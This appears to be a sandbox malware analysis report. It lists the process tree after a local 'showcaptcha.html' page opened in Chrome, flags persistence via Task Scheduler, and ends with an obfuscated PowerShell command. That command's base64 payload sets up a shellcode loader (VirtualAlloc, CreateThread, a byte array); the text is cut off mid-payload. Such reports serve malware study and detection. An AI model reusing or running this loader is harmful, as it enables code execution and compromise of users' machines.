PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3420 wrote to memory of 4176 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\showcaptcha.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff984f09758,0x7ff984f09768,0x7ff984f09778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=328 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3020 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.0.496467355\552327086" -parentBuildID 20221007134813 -prefsHandle 1872 -prefMapHandle 1868 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0545262d-a97e-45fc-b56c-1b1488aa505e} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 1952 1e9f25dac58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.1.228310557\1411636788" -parentBuildID 20221007134813 -prefsHandle 2332 -prefMapHandle 2328 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c01249e-e5ef-490b-b291-7568b4811a38} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2360 1e9f23e5658 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.2.1928703970\1166002412" -childID 1 -isForBrowser -prefsHandle 3280 -prefMapHandle 3276 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99425484-831f-4665-a204-43e0ca8f5a22} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2912 1e9f255e758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.3.897746709\1463188637" -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2663c401-e8ef-466f-9bc7-735a976771fc} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 3632 1e9de961958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.4.1541525042\1617074344" -childID 3 -isForBrowser -prefsHandle 4712 -prefMapHandle 4708 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49c92963-38e8-495b-b716-9227dfc93e01} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 4724 1e9f869f258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.5.923604413\852831163" -childID 4 -isForBrowser -prefsHandle 5028 -prefMapHandle 4992 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d1de743-c17f-42ff-9ab5-a829b5ea0a09} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5004 1e9de930258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.6.1877094455\1239144281" -childID 5 -isForBrowser -prefsHandle 5296 -prefMapHandle 5292 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88af527e-c9ee-4c03-93f4-05bbf86f10c3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5304 1e9f5c34d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.7.999720461\477690942" -childID 6 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdde0178-3b42-4d8a-8e98-8495fec6c20a} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5508 1e9de964158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.8.2011626743\1593798441" -childID 7 -isForBrowser -prefsHandle 4104 -prefMapHandle 2732 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f15d8e3-1aff-4d49-ae30-91d4aa148fd3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2884 1e9f85a9258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.9.1182793985\1244494078" -childID 8 -isForBrowser -prefsHandle 5812 -prefMapHandle 5824 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9f1c500-bfe0-4e17-a7bf-a120586cb7ef} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5820 1e9f4e4f558 tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1348 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.10.1435694696\721073392" -childID 9 -isForBrowser -prefsHandle 4828 -prefMapHandle 4836 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af9360c2-7197-4fb3-845f-0467d2919707} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5172 1e9f9e2b958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.11.1985748577\43867022" -parentBuildID 20221007134813 -prefsHandle 5980 -prefMapHandle 6028 -prefsLen 26460 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fa30e0e-c05b-4594-80f2-44c807e93ced} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5996 1e9fa10f658 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.12.2114010987\876774538" -childID 10 -isForBrowser -prefsHandle 5332 -prefMapHandle 5220 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50a54546-1d5a-40c9-9cd6-75fe3ddbdbe9} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5908 1e9f5c65f58 tab

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4e8 0x4c0

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.13.804170478\409992591" -childID 11 -isForBrowser -prefsHandle 6472 -prefMapHandle 6468 -prefsLen 27425 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4dc20bdc-2b11-4e54-bbaf-65a4c6622652} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 6484 1e9f932cd58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.14.455406405\527018596" -childID 12 -isForBrowser -prefsHandle 4908 -prefMapHandle 3316 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69a9cd44-0e8d-40d4-9660-61d56d69bbd6} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 4784 1e9f9b9c458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.15.1005855958\1191682558" -childID 13 -isForBrowser -prefsHandle 6844 -prefMapHandle 6848 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9dbc297-2a64-478a-83ab-b489f1e6fd39} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5396 1e9fbf1bf58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.16.467847512\853206893" -childID 14 -isForBrowser -prefsHandle 5088 -prefMapHandle 5140 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c44b810e-4aa0-4720-b836-bd9880edfd5a} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 6936 1e9f9eb3758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.17.1471832794\537484187" -childID 15 -isForBrowser -prefsHandle 5308 -prefMapHandle 4908 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08d21772-198c-454f-a54d-00153c56a1e9} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5320 1e9f5c66558 tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3724 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff984f09758,0x7ff984f09768,0x7ff984f09778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2256 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3276 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3296 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3832 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4844 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4996 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5040 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5496 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5764 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2224 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv TG -;sv rk ec;sv Sj ((gv TG).value.toString()+(gv rk).value.toString());powershell (gv Sj).value.toString() 'JAB1AGoAIAA9ACAAJwAkAFQATwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAGwAcgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQATwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABWAFkAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAYQBjACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAA